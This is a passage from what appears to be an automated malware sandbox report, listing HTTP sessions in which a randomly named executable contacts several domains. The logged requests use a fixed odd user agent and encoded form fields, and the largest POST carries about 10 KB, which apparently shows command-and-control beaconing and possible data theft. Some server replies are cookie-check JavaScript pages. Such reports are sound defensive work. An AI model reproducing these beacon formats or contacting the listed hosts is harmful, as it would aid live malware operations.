                                                                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                    Nov 21, 2024 16:59:39.284473896 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.450042161.97.142.144803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:40.611195087 CET346OUTGET /jm2l/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=M21ir/NSFfGrmB4sne/SCCGX/e/txCX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyn/BAme0mP+U7kiozXG5r1hn7yWn0dKNvWy4= HTTP/1.1
                                                                                                                    Host: www.54248711.xyz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:59:41.917891979 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:41 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 2966
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: "66cce1df-b96"
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:59:41.917920113 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                    Nov 21, 2024 16:59:41.917938948 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                    Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.450043185.27.134.206803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:47.212202072 CET628OUTPOST /cvhb/ HTTP/1.1
                                                                                                                    Host: www.canadavinreport.site
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.canadavinreport.site
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 77 59 56 49 50 58 74 35 63 54 5a 42 63 46 72 32 6a 56 67 78 4a 6a 33 6a 42 36 55 39 77 52 69 50 44 77 6c 35 70 2b 48 64 34 2f 6a 36 4d 72 72 6a 2b 4a 67 49 42 57 36 34 6b 66 6f 76 59 46 63 4d 4f 4c 72 4c 4e 4c 6d 65 38 64 68 4e 5a 4c 78 52 72 77 55 71 30 5a 79 55 52 61 68 42 56 67 52 6d 37 37 6e 63 4d 45 42 4a 4c 44 32 57 4c 2f 56 6f 5a 6f 7a 53 4c 6f 61 30 39 55 30 62 35 49 68 42 4f 59 75 64 4c 44 34 4b 51 55 51 62 52 71 73 6b 76 61 76 2b 35 44 72 61 5a 46 68 68 6f 4a 74 35 48 66 75 4a 41 72 75 4a 30 77 6e 30 54 32 56 54 57 4e 55 65 46 41 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=TZV6il5lEq3jwYVIPXt5cTZBcFr2jVgxJj3jB6U9wRiPDwl5p+Hd4/j6Mrrj+JgIBW64kfovYFcMOLrLNLme8dhNZLxRrwUq0ZyURahBVgRm77ncMEBJLD2WL/VoZozSLoa09U0b5IhBOYudLD4KQUQbRqskvav+5DraZFhhoJt5HfuJAruJ0wn0T2VTWNUeFA==
                                                                                                                    Nov 21, 2024 16:59:48.452073097 CET1041INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:48 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 840
                                                                                                                    Connection: close
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                    Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.450044185.27.134.206803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:49.883474112 CET648OUTPOST /cvhb/ HTTP/1.1
                                                                                                                    Host: www.canadavinreport.site
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.canadavinreport.site
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 32 50 41 53 74 35 6f 37 37 64 78 76 6a 36 48 4c 72 6d 78 70 67 39 42 57 6d 47 6b 61 49 76 59 45 34 4d 4f 4a 7a 4c 4e 38 79 64 38 4e 68 50 56 72 78 50 6b 51 55 71 30 5a 79 55 52 61 46 72 56 67 4a 6d 37 4c 33 63 4d 6c 42 47 55 7a 32 4a 4d 2f 56 6f 53 49 7a 57 4c 6f 61 47 39 56 34 69 35 4b 5a 42 4f 59 2b 64 4c 57 55 4c 48 45 51 42 66 4b 74 4b 6d 61 6d 33 37 68 4b 37 63 56 42 36 70 4b 31 75 43 5a 6a 54 52 61 50 65 6d 77 44 48 4f 78 63 6e 62 4f 70 58 65 47 41 34 37 54 4d 64 47 6c 51 31 71 50 78 4b 66 4b 4b 66 69 76 4d 3d
                                                                                                                    Data Ascii: GzeXFT7=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5Ytsz2PASt5o77dxvj6HLrmxpg9BWmGkaIvYE4MOJzLN8yd8NhPVrxPkQUq0ZyURaFrVgJm7L3cMlBGUz2JM/VoSIzWLoaG9V4i5KZBOY+dLWULHEQBfKtKmam37hK7cVB6pK1uCZjTRaPemwDHOxcnbOpXeGA47TMdGlQ1qPxKfKKfivM=
                                                                                                                    Nov 21, 2024 16:59:51.165776014 CET1041INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:50 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 840
                                                                                                                    Connection: close
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                    Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.450045185.27.134.206803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:52.557588100 CET10730OUTPOST /cvhb/ HTTP/1.1
                                                                                                                    Host: www.canadavinreport.site
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.canadavinreport.site
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 4f 50 44 6e 68 35 70 59 54 64 72 76 6a 36 5a 37 72 6e 78 70 67 67 42 57 2b 43 6b 61 4d 2f 59 47 77 4d 4f 71 37 4c 4c 4f 4b 64 33 4e 68 50 49 62 78 4f 72 77 55 2f 30 5a 69 51 52 61 31 72 56 67 4a 6d 37 4f 37 63 46 55 42 47 50 7a 32 57 4c 2f 56 61 5a 6f 7a 2b 4c 6f 7a 78 39 56 38 74 35 37 35 42 41 63 69 64 4a 6b 73 4c 45 6b 51 48 59 4b 74 6b 6d 61 36 30 37 68 6d 52 63 56 31 45 70 4d 4a 75 41 5a 76 4b 4f 70 6a 6b 33 69 44 45 4e 32 45 61 41 70 4e 61 64 47 67 44 37 51 6f 68 46 32 49 4b 6f 74 6c 48 45 35 44 5a 67 4c 50 51 68 55 73 62 47 30 44 79 35 6e 2f 55 4c 53 53 79 50 6d 5a 32 45 33 57 46 71 6d 42 4f 47 73 32 4d 4d 33 70 55 52 67 4a 58 5a 70 58 79 66 36 4e 32 50 41 6c 66 73 46 36 62 72 66 31 42 51 67 51 73 69 49 55 39 49 41 4b 4a 4f 69 63 36 44 42 6b 67 57 67 6f 45 66 4f 38 37 67 4b 79 35 4a 66 6a 36 32 52 2b 54 51 31 4e 4c 36 59 69 61 47 2b 38 5a 46 58 [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5YtszOPDnh5pYTdrvj6Z7rnxpggBW+CkaM/YGwMOq7LLOKd3NhPIbxOrwU/0ZiQRa1rVgJm7O7cFUBGPz2WL/VaZoz+Lozx9V8t575BAcidJksLEkQHYKtkma607hmRcV1EpMJuAZvKOpjk3iDEN2EaApNadGgD7QohF2IKotlHE5DZgLPQhUsbG0Dy5n/ULSSyPmZ2E3WFqmBOGs2MM3pURgJXZpXyf6N2PAlfsF6brf1BQgQsiIU9IAKJOic6DBkgWgoEfO87gKy5Jfj62R+TQ1NL6YiaG+8ZFXLnfkOIMIG9OikFVVYAWJTeFloVEIkWwAe3dXAGJ12fs6nnIxM0QWsS/u/kzxuMjEfjBje0kCnwTziT7dFwNdXpA5adLTdtxNcRGH0lsRJUsil0ThwasUMKjvUS9slt23LIJl/RrIkQmdZcB/ga1mzpBTkNR/ENSzdxq7VVlylE4Knu9vrTaEfLp9dkIYwSqeJfs4Nr4tlfdTNkGCVJ5POCl2D7eAruJJaJQ0RuolKjTEtpkIMWXOoDJ+tFqODMliV25LlGC6LH7LvFu8+nfJuP0cGgXLaoq2U87cRy8M78P/qSetWPnTsjb8v2vpeOAYeecL7eUe+M+LoQp0oSFBH/sJ/sxR20SbrP2pOCkhtZBuBjQ4Hd/w4H/mfCUXA7Y/N7RVyGTEoZvEjeBf85+elPUb0r4qUzkVFehjOsRCriRL3F3KzmuNj0a9MamYuTTIoFb7o1sKlewZz2Mc+1oJSBzm/ofU0ZTVp94ajegoPFeSVg28eVvsMXQExLu17i6HhDsdksTWkSrDlacIenEvlIAIdq61h91uj2tWP4XVfGCMqC4eXCaNf9Wa4JiUmrwtbebMv5ZCJ95ec9rH5AmM/fLsvEMXZ6vckh/amglbdjh3YxBbrxSV7Ed8NfkwIJKPofBhrLkdQHoWBZGPq8gIu7+lbsK/Ivh916 [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:59:53.839373112 CET1041INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:53 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 840
                                                                                                                    Connection: close
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                    Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.450046185.27.134.206803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:55.222924948 CET354OUTGET /cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSe3+c8RKpZ8QdwyK2YX5FHCjlm36TVHFBRCwU=&aJZ=OnOxa0A0n0BXj0 HTTP/1.1
                                                                                                                    Host: www.canadavinreport.site
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:59:56.552670956 CET1189INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:56 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 988
                                                                                                                    Connection: close
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                    Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?GzeXFT7=eb9ahS5GFYDOhq0WWSJwR0pgVyjGk3ZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSe3+c8RKpZ8QdwyK2YX5FHCjlm36TVHFBRCwU=&aJZ=OnOxa0A0n0BXj0&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.450047172.67.138.37803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 17:00:01.859453917 CET610OUTPOST /z3ox/ HTTP/1.1
                                                                                                                    Host: www.questmatch.pro
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.questmatch.pro
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
